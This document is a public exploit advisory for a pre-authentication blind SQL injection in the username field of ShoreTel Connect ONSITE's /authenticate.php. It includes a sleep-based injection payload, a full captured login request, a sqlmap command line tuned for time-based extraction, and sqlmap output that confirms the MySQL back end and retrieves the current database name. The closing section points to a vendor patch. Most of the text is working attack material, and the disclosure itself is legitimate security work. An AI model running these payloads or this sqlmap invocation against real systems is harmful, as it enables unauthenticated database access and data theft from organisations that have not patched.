ShoreTel Connect ONSITE - Blind SQL Injection

# Exploit Title: ShoreTel Connect ONSITE Blind SQL Injection Vulnerability
# Date: 19-09-2016
# Software Link:
https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview
# Exploit Author: Iraklis Mathiopoulos
# Contact: https://twitter.com/_imath_
# Website: https://medium.com/@iraklis
# Category: webapps

1. Description

Versions of ShoreTel Connect ONSITE prior and including 21.79.4311.0
are vulnerable to a Blind SQL Injection in /authenticate.php, on the webserver
that is running the Conference system.

Specifically, the POST parameter "username" is not sanitised prior to being used
in SQL Queries. Using test'%20and%20(select*from(select(sleep(35)))a)--%20
for the username value the server will respond after approximately 35 seconds.

No authentication is needed in order to exploit the vulnerability as the issue
resides in the pre-authentication realm of the system.


2. Proof of Concept

req.burp:
---
POST https://[REDACTED].com/authenticate.php HTTP/1.1
Host: [REDACTED].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[REDACTED].com/signin.php?ret=index.php&brand=1&brandUrl=index.php&rand=377311852
Cookie: PHPSESSID=fd3eb46033541487cce7774b917c655d
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 197

password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw%3D%3D&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123&vpassword=&SUBMIT1=Sign+In
- ---

root@kali:~/projects# sqlmap -r req.burp -p username --dbms=mysql
--technique=T --time-sec=10  --level=5 --risk=3 --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201607120a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org


[*] starting at 19:59:34

[19:59:34] [INFO] parsing HTTP request from 'req.burp'
[19:59:34] [INFO] testing connection to the target URL
[19:59:42] [INFO] checking if the target is protected by some kind of
WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
- ---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw==&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123'
AND (SELECT * FROM (SELECT(SLEEP(10)))Qlhs) AND 'jIev' LIKE
'jIev&vpassword=&SUBMIT1=Sign In
- ---
[19:59:54] [INFO] testing MySQL
[20:02:25] [INFO] confirming MySQL
[20:03:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[20:03:12] [INFO] fetching current database
[20:03:12] [INFO] retrieved: [REDACTED]
current database:    '[REDACTED]'
[20:21:10] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/[REDACTED].com'

[*] shutting down at 20:21:10

3. Solution:

Install the latest version of ShoreTel Connect ONSITE
https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK

Related ShoreTel security bulletin:
https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK